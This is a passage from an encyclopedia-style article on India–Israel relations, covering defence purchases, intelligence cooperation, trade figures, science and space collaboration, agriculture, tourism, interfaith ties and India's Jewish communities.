In December 2009, Lt Gen Gabi Ashkenazi, Chief of Staff of the Israel Defense Forces, made a visit to India to cement the defence ties between the two countries. He pledged every help to India in fighting terrorism.
In March 2011, it was reported that India would buy 8356 Israeli Spike anti-tank missiles, 321 launchers, 15 training simulators and peripheral equipment, for $1 billion, from Israel's Rafael Advanced Defense Systems. The deal was finalised by Prime Minister Narendra Modi after coming into office.
In September 2015, the Indian government approved the air force's request to purchase 10 Heron TP drones from Israel Aerospace Industries (IAI). In 2015, a delegation from Israel's Jerusalem Center for Public Affairs visited India, led by former Israeli ambassador to the United Nations Dore Gold. Shared strategic interests were discussed, including combatting radical Islam, the handling of territorial disputes, and the security situation in West Asia/the Middle East and South Asia.
In October 2015, The Pioneer reported that India and Israel were planning to hold their first joint military exercise. The date and location were not announced.
In September 2016, the Indian government approved the purchase of two more Phalcon AWACS.
In 2017, the countries signed a military agreement worth US$2 billion.
In 2017, India participated in the Blue Flag exercise in Uvda Air Force Base in southern Israel for the first time, where it deployed its elite and Garud Commando Force and a Hercules C-130J plane from its "Veiled Vipers" Squadron. Indian and Israeli special forces conducted a range of tactical joint exercises, which included protection of strategic assets, ground infiltration and evacuation.
The Indian Air Force sent five Dassault Mirage 2000 fighter aircraft to participate in Blue Flag 2021.
The Defence Research and Development Organisation (DRDO) and the Directorate of Defence Research and Development (DDR&D) signed a Bilateral Innovation Agreement on 9 November 2021. The agreement facilitates the joint production of defence technology such as drones, robotics, artificial intelligence, quantum technology and other areas. Production will be jointly funded by both agencies and all technologies developed under the agreement will be available for use by both India and Israel.
Intelligence-sharing cooperation
When the Research and Analysis Wing (RAW) was founded in September 1968 by Rameshwar Nath Kao, he was advised by then Prime Minister Indira Gandhi to cultivate links with Mossad. This was suggested as a countermeasure to military links between that of Pakistan and China, as well as with North Korea. Israel was also concerned that Pakistani army officers were training Libyans and Iranians in handling Chinese and North Korean military equipments.
Pakistan believed intelligence relations between India and Israel threatened Pakistani security. When young Israeli tourists began visiting the Kashmir valley in the early 1990s, Pakistan suspected they were disguised Israeli army officers there to help Indian security forces with anti-terrorism operations. Israeli tourists were attacked, with one slain and another kidnapped. Pressure from the Kashmiri Muslim diaspora in the United States led to the kidnapped tourist's eventual release. Kashmiri Muslims feared that the attacks could isolate the American Jewish community, and result in them lobbying the US government against Kashmiri separatist groups.
A Rediff story in 2003 revealed clandestine links between R&AW and Mossad. In 1996, R.K. Yadav, a former RAW official had filed a disproportionate assets case in the Delhi High Court against Anand Kumar Verma, RAW chief between 1987 and 1990. Yadav listed eight properties that he claimed were purchased illegally by Verma using RAW's unaudited funds for secret operations. Although his petition for a CBI inquiry into Verma's properties was dismissed, Yadav managed to obtain more information through a right to information request in 2005 and filed another case in 2009. In 2013, the CBI carried out an investigation of Verma's properties. Proceedings in the Delhi High Court revealed the names of two companies floated by RAW in 1988 – Piyush Investments and Hector Leasing and Finance Company Ltd. The firms were headed by two senior RAW officials V. Balachandran and B. Raman. Balachandran and Raman retired in 1994 and 1995 respectively. The companies were listed as trading houses that dealt in several kinds of minerals, automobiles, textiles, metals and spare parts, and also claimed to produce feature films. The companies purchased two flats in Gauri Sadan, a residential building on Hailey Road, New Delhi in March 1989 for 23 lakh.
India Today reported that the two flats were RAW safe houses used as operational fronts for Mossad agents and housed Mossad's station chief between 1989 and 1992. RAW had reportedly decided to have closer ties to Mossad, and the subsequent secret operation was approved by then Prime Minister Rajiv Gandhi. India Today cites "RAW insiders" as saying that RAW agents hid a Mossad agent holding an Argentine passport and exchanged intelligence and expertise in operations, including negotiations for the release of an Israeli tourist by the Jammu and Kashmir Liberation Front militants in June 1991. When asked about the case Verma refused to speak about the companies, but claimed his relationship with them was purely professional. Raman stated, "Sometimes, spy agencies float companies for operational reasons. All I can say is that everything was done with government approval. Files were cleared by the then prime minister [Rajiv Gandhi] and his cabinet secretary. Balachandran stated, "It is true that we did a large number of operations but at every stage, we kept the Cabinet Secretariat and the prime minister in the loop."
In November 2015, The Times of India reported that agents from Mossad and MI5 were protecting Prime Minister Narendra Modi during his visit to Turkey. Modi was on a state visit to the United Kingdom and was scheduled to attend the 2015 G-20 Summit in Antalya, Turkey. The paper reported that the agents had been called in to provide additional cover to Modi's security detail, composed of India's Special Protection Group and secret agents from RAW and IB, in wake of the November 2015 Paris attacks.
On 14 February 2019, a convoy of vehicles carrying security personnel on the Jammu Srinagar National Highway was attacked by a vehicle-borne suicide bomber at Lethpora in the Pulwama district, Jammu and Kashmir, India. 40 Central Reserve Police Force personals were killed by the bomber. Israel responded to India, offering "unconditional support" to the Indian Army and the Government. Israel has informed that they will share intelligence and technology to help India respond.
Bilateral trade
Bilateral trade between India and Israel grew from $200 million in 1992 to $4.52 billion in 2014. As of 2014, India is Israel's tenth-largest trade partner and import source, and seventh-largest export destination. India's major exports to Israel include precious stones and metals, organic chemicals, electronic equipment, plastics, vehicles, machinery, engines, pumps, clothing and textiles, and medical and technical equipment. Israel's imports from India amounted to $2.3 billion or 3.2% of its overall imports in 2014. Israel's major exports to India include precious stones and metals, electronic equipment, fertilisers, machines, engines, pumps, medical and technical equipment, organic and inorganic chemicals, salt, sulphur, stone, cement, and plastics. Israeli exports to India amounted to $2.2 billion or 3.2% of its overall exports in 2014. The two countries have also signed a 'Double Taxation Avoidance Agreement'.
In 2007, Israel proposed starting negotiations on a free trade agreement with India, and in 2010, then Indian Prime Minister Manmohan Singh accepted that proposal. The agreement is set to focus on many key economic sectors, including information technology, biotechnology, water management, pharmaceuticals, and agriculture. In 2013, then Israeli Minister of Economy Naftali Bennett projected a doubling of trade from $5 to $10 billion between the two countries, if a free trade agreement was successfully negotiated. As of 2015, negotiations on a free trade agreement continue, with both countries considering negotiating a more narrow free trade agreement on goods, followed by separate agreements on trade in investment and services.
Following the coronavirus pandemic, on 9 April 2020, India exported to Israel a five-ton shipment of drugs and chemicals. The consignment included ingredients for the drugs hydroxychloroquine and chloroquine. On this occasion, Sanjeev Singla, India's ambassador to Israel stressed the bilateral ties between both the countries. It was in March 2020, that Prime Minister Benjamin Netanyahu asked Modi to exempt Israel from the export ban on raw materials used to make medicines which would help in treating the patients affected with coronavirus. Israel will be sending life-saving equipment including oxygen generators and respirators to India throughout the week to assist it in the fight against coronavirus.
The 10 major commodities exported from India to Israel were:
Gems, precious metals and coins: $973.6 million
Organic chemicals: $296.5 million
Electronic equipment: $121.2 million
Medical, technical equipment: $59.3 million
Plastics: $56.4 million
Vehicles: $44.4 million
Machinery: $38.1 million
Other textiles, worn clothing: $31.8 million
Knit or crochet clothing: $31.6 million
Clothing (not knit or crochet): $30.8 million
Israeli exports to India amounted to $2.3 billion or 3.8% of its overall exports in 2015. The 10 major commodities exported from Israel to India were:
Gems, precious metals and coins: $933.7 million
Electronic equipment: $389.3 million
Medical, technical equipment: $180.7 million
Iron or steel products: $170.3 million
Fertilisers: $157 million
Machinery: $110.9 million
Organic chemicals: $69.8 million
Other chemical goods: $44.2 million
Inorganic chemicals: $43.6 million
Plastics: $29.5 million
Science and technology collaboration
In 1993, during the visit to India of then Israeli Foreign Minister Shimon Peres, India and Israel signed an agreement on science and technology, which allowed for direct scientific cooperation between both governments. Specific areas of cooperation included information technology, biotechnology, lasers, and electro-optics. Additionally, a joint committee to monitor collaboration between the two nations was established and set to meet biennially. In 1994, a $3 million joint science and technology fund was set up to facilitate R&D collaboration between both countries.
In 1996, Indian scientists attended a seminar on advanced materials in Israel. In 1997, Israeli scientists attended a seminar on biotechnology in Delhi. In 1998, India and Israel had 22 ongoing joint research projects. A joint symposium on the human genome was held in Jerusalem, where six Indian scientists took part. In November 1999, India and Israel agreed on four proposals for joint research projects in the field of human genome research. In 2000, even more joint projects related to human genome research were agreed on, and a status seminar on this field was held in India. In early 1999, more than 20 Israeli scientists participated in a physics symposium on condensed matter in Delhi. In 2001, a similar symposium was held in Jerusalem, with 18 Indian scientists attending.
In 2003, both countries discussed doubling their investment in their ongoing science and technology collaboration to $1 million each, starting in October 2004. In 2005, India and Israel signed a memorandum of understanding to set up a fund to encourage bilateral investment into industrial research and development and specific projects. Under the agreement, at least one Indian and one Israeli company must be collaborating on a project for that project to qualify for the fund. From 2006 to 2014, the fund, named i4RD, has been used in seven projects. In 2012, the two countries signed a five-year $50 million academic research agreement for promoting collaborative research across a wide range of disciplines, including medical and information technology, social and life sciences, humanities, and the arts.
In 2012, Israel stated its intent to increase technological and economic cooperation with the Indian state of Bihar, in the fields of agriculture, water management, solar energy, and medical insurance. In 2014, Israel made plans to open two agricultural centers of excellence in Bihar, focusing on increasing productivity of vegetable and mango crops.
Israel has offered to help the India government with a project to clean the Ganga. An Israeli delegation visited India in August 2015 and met with officials of the Union Ministry of Water Resources, River Development and Ganga Rejuvenation. Israeli Ambassador to India Daniel Carmon also called on Union Urban Development and Parliamentary Affairs Minister M. Venkaiah Naidu to offer Israel's expertise in water management to battle water scarcity. Ohad Horsandi, spokesperson of the Israeli Embassy in New Delhi stated that Israel was keen to help in India meet its water needs for agriculture and drinking, and was pushing for more government-to-government agreements.
Following Prime Minister Modi's visit to Israel in 2017, there has been an increased call for collaboration between Israel and India on innovation development. The non-profit Indian based global trade body, NASSCOM, along with the professional service company, Accenture, released the report Collaborative Innovation: The Vehicle Driving Indo-Israel Prosperity, to highlight areas of scientific and technological collaboration between the two countries. Additionally, the non-profit organization TAVtech Ventures is launching a program that connect students from Israel and the United States with local Indian students to come up with tech-based startups.
Space collaboration
In 2002, India and Israel signed a cooperative agreement promoting space collaboration between both nations.
In 2003, the Israel Space Agency, or ISA, expressed interest in collaborating with the Indian Space Research Organisation, or ISRO, in using satellites for improved management of land and other resources. Israel also expressed interest in participating in ISRO's proposed mission of sending an unmanned craft to the moon. Additionally, the two countries signed an agreement outlining the deployment of TAUVEX, an Israeli space telescope array, on India's GSAT-4, a planned navigation and communication satellite. In 2010, the TAUVEX array was removed from GSAT-4 by the ISRO, and the array was never subsequently launched. The GSAT-4 itself failed to launch, due to the failure of its cryogenic engine.
In 2005, Israel decided to launch TecSAR, its first synthetic aperture radar imaging satellite, on India's Polar Satellite Launch Vehicle, or PSLV. TecSAR was chosen to launch through India's PSLV due to Israeli concerns about the reliability and technical limitations of its own Shavit space launch vehicle, economic considerations, and also due to Israel's desire to increase strategic cooperation with India. In 2008, TecSAR was successfully inserted into orbit by India's PSLV. One of TecSAR's primary functions is to monitor Iran's military activities.
In 2009, India successfully launched RISAT-2, a synthetic aperture radar imaging satellite. RISAT-2 was manufactured by Israel Aerospace Industries, or IAI, in conjunction with ISRO. The launch of the RISAT-2 satellite aimed to provide India with greater earth observation power, which would improve disaster management, and increase surveillance and defense capabilities. The acquisition and subsequent launch of the RISAT-2 satellite was accelerated after the 2008 Mumbai attacks, to boost India's future surveillance capabilities.
Agriculture collaboration
India has chosen Israel as a strategic partner (G2G) in the field of agriculture.This partnership evolved into the Indo-Israel Agricultural Project (IIAP), under the Indo Israel Action Plan, based on a MOU signed by Indian and Israeli ministers of Agriculture in 2006. The partnership aim to introduce crop diversity, increasing productivity & increasing water use efficiency. IIAP has been initiated in 2009 after signing a bilateral agreement between Indian and Israeli ministers of Agriculture (2006). IIAP is implemented via establishment of Centers of Excellence (CoE), in which Israeli Technologies and know-how are disseminated tailored to local Indian conditions. Till date three phases of IIAP has been channeled. Each IIAP phase lasts for three years (2009–2012; 2012–2015, 2015–2018).Within the 16 States that has been invited to take part in the IIAP, 22 CoE's are currently into the fully active stage.
Acknowledging the success of MIDH MASHAV IIAP Program as implemented during the last decade a three-year work program in Agriculture” 2018–2020 was signed between the Ministry of Agriculture and Farmer's Welfare of the Republic of India and MASHAV- Ministry of Foreign Affairs Israel to increase the value chain demonstrated with the fully operative Indo-Israel Center of Excellence by introducing new components including the Indo-Israeli Centre of Excellence for Animal Husbandary & Dairying, Hisar. Center of Excellence (CoE) is a platform for knowledge transfer and Israeli Agro-Technology. As a goal the CoE aims to serve the farmer with a focus on a key crop. Each CoE is composed of Nursery management, Cultivation techniques, and Irrigation and fertigation.
Also in 2008, Israel and India finalised an agricultural plan introducing crops native to the Middle East and Mediterranean to India, with a particular focus on olives. Subsequently, around 112,000 olive trees were planted in the desert of Rajasthan. In 2014, more than 100 tonnes of olives were produced in Rajasthan.
Oil and natural gas sector cooperation
With the recent discovery of the Tamar and Levianthan gas fields off the coast of Israel, India has been one of the first countries to bid for an exploration license in order to extract and import natural gas from the Jewish State. India's ONGC Videsh, Bharat PetroResources, Indian Oil and Oil India were awarded an exploration license by the Israeli government, a clear sign of the ongoing diversification in ties between the two countries.
Cultural ties and cross-country perceptions
In 2011, cultural artists and performers from India arrived in Israel to participate in a three-week festival commemorating 20 years of diplomatic relations between the two countries. According to India's then Ambassador to Israel Navtej Sarna, the purpose of the festival was to improve the bilateral relationship between the two countries by facilitating a greater understanding of each other's culture.
According to a 2009 international study commissioned by the Israeli Foreign Ministry, the greatest level of sympathy towards Israel can be found in India, with 58% of Indian respondents showing sympathy towards Israel.
As reported in 2015, opinion polls taken in India showed 70% and above of respondents had favorable views of Israel.
In 2015, the United Nations General Assembly voted unanimously in favour of adopting June 21 as International Yoga Day. In a clear sign of growing affinity between the two countries, the Indian Embassy in Tel Aviv organizes annual yoga day celebrations, where Israelis from all walks of life take part in various yogic exercises. Yoga has proven to be immensely popular in Israel and is a sign of Israel's cultural connection to India.
In 2019, Israel was a country partner at an event scheduled to be held in the central university Jamia Millia Islamia. Israel's involvement was protested against by students for their "occupation of Palestine." The university relented and announced that "it would not allow Israeli delegates to take part in events on the campus in future." Some Members of Parliament (MPs) had also lent support to the protesting students. The teachers association at Jamia had in 2014 protested against Israeli offensive in Gaza and were joined by various activists, academicians, human rights defenders and members of civil society.
Tourism
Around 40,000 Israelis, many of whom have just finished military service, visit India annually. There are dozens of Chabad-operated community centers in India, where many Israelis celebrate holidays and observe religious traditions. Popular destinations for Israelis include Goa, the Himalayas, Old Manali, Vashisht, Naggar, Kasol, and the villages surrounding Dharamsala. In many of these areas, Hebrew signs on businesses and public transportation are widely noticeable.
The number of tourists from India visiting Israel touched 15,900 in the year 2000. By 2010, the number of tourists had increased to 43,439. In 2014, the number of tourists from India visiting Israel was 34,900. A popular destination for Indian tourists traveling to Israel is Jerusalem. In part of 2010, Indian tourists were the biggest spenders in Israel, spending an average of $1,364 per tourist; the average tourist expenditure in Israel during this time was $1,091.
In 2011, representatives from both countries met in Delhi, and planned to enhance tourism through collaboration in the spheres of destination management and promotion, as well as in manpower development. Plans for tour-operators and travel agents in both countries to coordinate were also discussed. In 2015, 600 travel agents from India arrived in Israel for the annual Travel Agents Federation of India conference, and ways to decrease barriers to tourism were discussed. Currently El AL Airlines flies between Tel Aviv and Mumbai, Air India flies between Delhi and Tel Aviv and Arkia flies between Tel Aviv and Kochi as well as Tel Aviv and Goa.
In March 2018, Air India, operating flight number AI139, became the first airline to fly non-stop from New Delhi to Tel Aviv, via the airspace of Saudi Arabia, overturning an overfly ban on flights to Israel that had lasted 70 years. Currently, Air India is the only airline in the world that has been given such permission, and indicates a behind-the-scenes improvement in relations between Israel and the Arab world. The new flight takes approximately 7 hours to traverse the distance between India and Israel, which is 2 hours and 10 minutes shorter than the route taken by EL AL from Mumbai to Tel Aviv. In recent days, the success of the route has prompted the airline to increase the frequency of flights to one each day.
In recent months, Israel has observed a constant rise in the number of Indian tourists to the country. Towards an additional effort to boost tourism from India, the Israeli government has simplified visa procedures for Indians who have already availed visas from either Canada, Australia, United States, Schengen countries or Israel and have completed their travel to these countries. Visa processing fees for Indian applicants has also been reduced from the original 1700 to 1100. In the year 2017, Indian tourist arrivals to Israel rose by 31%, with over 60,000 tourists visiting the country that year. Israel plans to meet a target of over 100,000 Indian tourists for the year 2018.
Interfaith relations
In February 2007, the first Jewish-Hindu interfaith leadership summit was held in New Delhi. The summit included the then Chief Rabbi of Israel Yona Metzger, the American Jewish Committee's International Director of Interreligious Affairs David Rosen, a delegation of chief rabbis from around the world, and Hindu leaders from India. During the summit, Rabbi Metzger stated that "Jews have lived in India for over 2,000 years and have never been discriminated against. This is something unparalleled in human history."
In August 2007, amidst protests, a delegation of Indian Muslim leaders and journalists traveled to Israel. The visit was touted as a dialogue of democracies, and was organised by the American Jewish Committee's India office. During this trip, Maulana Jameel Ahmed Ilyasi, the then secretary-general of the All-India Association of Imams and Mosques, praised the mutual respect Israeli Arabs and Israeli Jews have for each other, and encouraged resolving problems by dialogue rather than violence. Muslim leaders met with then president Shimon Peres, where Peres highlighted the coexistence of religions in Jerusalem and India's struggle with terror and separatism.
In 2008, a second Hindu-Jewish summit took place in Jerusalem. Included in the summit was a meeting between Hindu groups and then Israeli President Shimon Peres, where the importance of a strong Israeli-Indian relationship was discussed. The Hindu delegation also met with Israeli politicians Isaac Herzog and Majalli Wahabi. Hindu groups visited and said their prayers at the Western Wall, and also paid their respects to Holocaust victims.
In 2009, a smaller Hindu-Jewish interfaith meeting organised by the Hindu American Foundation and the American Jewish Committee was held in New York City and Washington. Hindu and Jewish representatives gave presentations, and participants wore lapel pins combining the Israeli, Indian, and American flags.
In November 2012, Israeli President Shimon Peres remarked, "I think India is the greatest show of how so many differences in language, in sects can coexist facing great suffering and keeping full freedom."
In 2019, a large scale summit to further boost Hindu-Jewish cultural ties was organized by Indo-Israel Friendship Association in Mumbai. Many important leaders like Subramanian Swamy attended the event.
Judaism in India
The history of the Jewish people in India dates back to ancient times. Judaism was one of the first foreign religions to arrive in India in recorded history. Indian Jews are a religious minority of India, but unlike many parts of the world, have historically lived in India without any instances of antisemitism from the local majority populace, the Hindus. The better-established ancient communities have assimilated a large number of local traditions through cultural diffusion. The Jewish population in India is hard to estimate since each Jewish community is distinct with different origins; while some allegedly arrived during the time of the Kingdom of Judah, others are seen by some as descendants of Israel's Ten Lost Tribes. In addition to Jewish expatriates and recent immigrants, there are several distinct Jewish groups in India:
Cochin Jews, also called Malabar Jews, are of Mizrahi and Sephardi heritage. They are the oldest group of Jews in India, with possible roots claimed to date to the time of King Solomon. The Cochin Jews settled in the Kingdom of Cochin in South India.
The so-called "Spanish and Portuguese Jews", Paradesi Jews and British Jews arrived at Madras during the 16th century, mainly as traders and diamond businessmen. They also have a large presence in the former Portuguese colony of Goa, where the Goan Inquisition was initiated in 1560.
The Bene Israel arrived in the state of Maharashtra 900 years ago. Another branch of the Bene Israel community, resided in Karachi until the Partition of India in 1947, when they fled to India (in particular: Mumbai). Many of them also moved to Israel. The Jews from Sindh, Punjab or Pathan area are often incorrectly called Bani Israel Jews. The Jewish community who used to reside in other parts of what became Pakistan (such as Lahore or Peshawar) also fled to India in 1947, in a similar manner to the larger Karachi Jewish community.
The Baghdadi Jews arrived in the city of Surat from Iraq (and other Arab states), Iran and Afghanistan about 250 years ago.
The Bnei Menashe are Mizo and Kuki tribesmen in Manipur and Mizoram who are recent converts to Judaism.
The Bene Ephraim (also called "Telugu Jews") are a small group who speak Telugu; their observance of Judaism dates to 1981.
The majority of Indian Jews have "made Aliyah" (migrated) to Israel since the creation of the modern state in 1948. Over 70,000 Indian Jews now live in Israel (over 1% of Israel's total population). Of the remaining 5,000, the largest community is concentrated in Mumbai, where 3,500 have stayed over from the over 30,000 Jews registered there in the 1940s, divided into Bene Israel and Baghdadi Jews, though the Baghdadi Jews refused to recognize the B'nei Israel as Jews, and withheld dispensing charity to them for that reason. There are reminders of Jewish localities in Kerala still left such as Synagogues.
In the beginning of the 21st century, new Jewish communities have been established in Mumbai, New Delhi, Bangalore, and other cities in India. The new communities have been established by the Chabad-Lubavitch movement which has sent rabbis to create those communities. The communities serve the religious and social needs of Jewish business people who have immigrated or visiting India, and Jewish backpackers touring India. The largest centre is the Nariman House in Mumbai. There are currently 33 synagogues in India, although many no longer function as such and today vary in their levels of preservation.
2021 Israeli embassy blast
A minor IED explosion took place outside the Israeli embassy in Delhi on 29 January 2021 when the two countries celebrated the 29th anniversary of India-Israel ties. Israel blames Iran for this.
See also
Israelis in India
Indians in Israel
Indian Jews in Israel
Indian Jews
Hinduism in Israel
Foreign relations of India
International recognition of Israel
Foreign relations of Israel
Battle of Haifa (1918)
References
External links
Rediff Portal – Ariel Sharon's visit to India
India-Israel Fellowship
Indo-Judaic: Philosophy, Research, Studies and Cultural Community
The Changing nature of Israeli-Indian Relations:1948 – 2005
Jews of India
Jewish Indian history
Israel
Bilateral relations of Israel
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.